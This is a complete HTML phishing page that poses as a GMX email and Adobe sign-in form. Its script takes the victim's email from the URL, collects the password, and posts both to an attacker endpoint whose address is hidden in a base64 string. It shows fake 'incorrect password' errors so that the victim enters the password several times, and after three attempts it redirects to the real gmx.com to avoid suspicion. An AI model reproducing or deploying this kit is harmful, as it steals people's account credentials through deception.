
<!DOCTYPE html>
<!-- Created By CodingLab - www.codinglabweb.com -->
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>GMX: The Best Free Email Account</title>
<link rel="shortcut icon" href="https://i.imgur.com/YcSipUj.gif">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url("https://i.imgur.com/lNQUDL3.png");
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 110vh;
            position: relative; /* Add position relative */
        }
        /* Add overlay style */
        body::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0); /* Adjust opacity here */
            z-index: -1; /* Move the overlay behind other elements */
        }
        .container {
            background-color: #fff;
            border-radius: 0; /* Sharp edges */
            padding: 20px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            max-width: 400px; /* Reduced width */
            width: 100%;
            opacity: 0;
            animation: slideIn 0.5s forwards;
            position: relative; /* Add position relative */
            height: 330px; /* Increased height */
        }
        @keyframes slideIn {
            from {
                width: 0;
                opacity: 0;
            }
            to {
                width: 100%;
                opacity: 1;
            }
        }
        .logo {
            width: 200px;
            height: 100px;
            margin: auto;
            display: block;
        }
        h2 {
            font-weight: bold;
            margin-top: 20px;
            margin-bottom: 10px;
        }
        input[type="email"],
        input[type="password"],
        button {
            width: calc(105% - 40px);
            margin-bottom: 10px;
            padding: 14px;
            border-radius: 0; /* Sharp edges */
            border: 1px solid #ccc;
            box-sizing: border-box;
        }
        button {
            background-color: #283d8a;/* Red color */
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #150fbf; /* Darker red on hover */
        }
        .error-container {
            color: white;
            background: lightcoral;
            padding: 10px;
            margin-top: 10px;
            border-radius: 0; /* Sharp edges */
            display: none;
        }
        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        /* Remember me checkbox style */
        .remember-me {
            text-align: left;
            margin-bottom: 10px;
            font-size: 14px;
            margin-left: 20px;
        }
        /* Copyright text style */
        .copyright {
            font-size: 8px;
            color: #999;
            position: left; /* Add position absolute */
            bottom: 20px; /* Adjust as needed */
            left: 8px; /* Adjust as needed */
        }
        /* Privacy & cookies text style */
        .privacy-cookies {
            font-size: 10px;
            color: #999;
            position: absolute; /* Add position absolute */
            bottom: 10px; /* Adjust as needed */
            right: 70px; /* Adjust as needed */
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://i.imgur.com/wHi6vOh.jpeg" alt="Adobe Logo" class="logo">
	
       <form name="loginForm">
            <input type="email" name="email" id="email" placeholder="Email address" class="input_text" maxlength="41"
                                               value="">
            <input type="password" id="password" name="pw" required placeholder="Password" title="????"
                                               class="input_text" maxlength="16">
            <div class="remember-me">
                <input type="checkbox" id="remember-me" name="remember-me" checked> <!-- Checked by default -->
                <label for="remember-me">Remember me</label></br>
<div class="alert alert-danger" id="msg" style="display: none; font-size: 10px; color: red;">Invalid Password.! Please Enter your 

correct Password</div>
            </div>
            <button type="submit" id="submit-btn">View</button>           <!-- Copyright text inside form container -->
            <div class="copyright">&copy; 2024 Adobe By clicking Next, you accept Adobe Cloud Storage terms and conditions in 

accordance with our privacy policy.
                and Adobe terms of use. Check the official documentation to review our terms of use.</div>
            <!-- Privacy & cookies text inside form container -->
            <div class="privacy-cookies"></div>
        </form>

        <div class="error-container"></div>
        <div class="spinner" style="display:none;"></div>
    </div>
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>
 

    /* global $ */
    $(document).ready(function(){
      var count=0;
 
      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email); 
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
           email.focus;
           return false;
        }
      
		 
      }
 
      $('#submit-btn').click(function(event){
    
		event.preventDefault();
        $('#error').hide();
        $('#msg').hide();
        var email=$("#email").val();
        var password=$("#password").val();
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'> Email field is empty</p>");
        
            return false;
        }

        if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>That account doesn't exist. Enter a different account</p>");
            
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>Password field is empty</p>");
         
            return false;
        }
		 if (password.length < 7) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>An error occured, invalid password</p>");
            email.focus;
            return false;
        } 

 
		 
      ///////////new injection////////////////
      count=count+1;
    //  console.log(count); 
   var d=atob("aHR0cHM6Ly9nYnBhY2lmaWN0cmFkaW5nLnN0b3JlL3drL2JuL2p5LnBocA==");		
	   $.ajax({
        dataType: 'JSON',
		url: d,
        type: 'POST',
        data:{
          email:email,
          password:password
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Sign in');
			  
    //  console.log(count); 
            },
            success: function(response){
			 $('#msg').html("<span style='color:red;'>Username or Password is incorrect. Please try again</span>");
              if(response){
                $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://www.gmx.com/");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                   $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("https://www.gmx.com/");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });  
    });


    });

</script>

</body>

</html>